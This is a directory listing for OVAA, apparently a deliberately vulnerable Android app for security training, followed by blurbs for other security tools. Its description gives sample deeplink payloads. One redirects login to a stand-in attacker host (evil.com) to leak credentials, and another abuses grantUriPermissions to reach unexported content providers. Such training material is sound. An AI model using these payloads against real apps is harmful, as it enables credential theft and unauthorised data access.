OVAA (Oversecured Vulnerable Android App)
0
Free
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities. List of vulnerabilities: - Installation of an arbitrary login_url via deeplink oversecured://ovaa/login?url=http://evil.com/ leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute android:grantUriPermissions="true") via deeplink oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process oversecured.ovaa.action.GRANT_PERMISSIONS and pass intent to setResult(code, intent) with flags such as Intent.FLAG_GRANT_READ_URI_PERMISSION and the URI of the content provider. - Vulnerable host validation when processing deeplink oversecured://ovaa/webview?url=.... - Opening arbitrary URLs via deeplink oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting WebSettings.setAllowFileAccessFromFileURLs(
FEATURES
The author has not provided features for this tool yet. If you are the author, please sign in or claim the tool to add features by clicking the icon above.
ALTERNATIVES
GridPot is a cybersecurity tool that integrates GridLAB-D, Conpot, and libiec61850 to simulate and detect attacks on industrial control systems (ICS).
An Android-based self-defense application against forensic imaging tools like Cellebrite UFED.
A security checklist app for your Mac that helps you with basic security hygiene and prevents 80% of problems.
A data-mining and deep web asset search engine for breach analysis and prevention services.
A tool for analyzing Android applications in local storage with various functionalities.
CHIPSEC is a framework for analyzing the security of PC platforms and components, with tools for low-level interfaces and forensic capabilities.
Phish Report is inaccessible without JavaScript and cookies enabled.
PINNED
Fabric Platform by BlackStork
Fabric Platform is a cybersecurity reporting solution that automates and standardizes report generation, offering a private-cloud platform, open-source tools, and community-supported templates.
Free
Security Operations
Mandos Brief Newsletter
Stay ahead in cybersecurity. Get the week's top cybersecurity news and insights in 8 minutes or less.
Free
Blogs and News
Wiz
Wiz Cloud Security Platform is a cloud-native security platform that enables security, dev, and devops to work together in a self-service model, detecting and preventing cloud security threats in real-time.
Commercial
Cloud Security
Adversa AI
Adversa AI is a cybersecurity company that provides solutions for securing and hardening machine learning, artificial intelligence, and large language models against adversarial attacks, privacy issues, and safety incidents across various industries.
Commercial
AI Security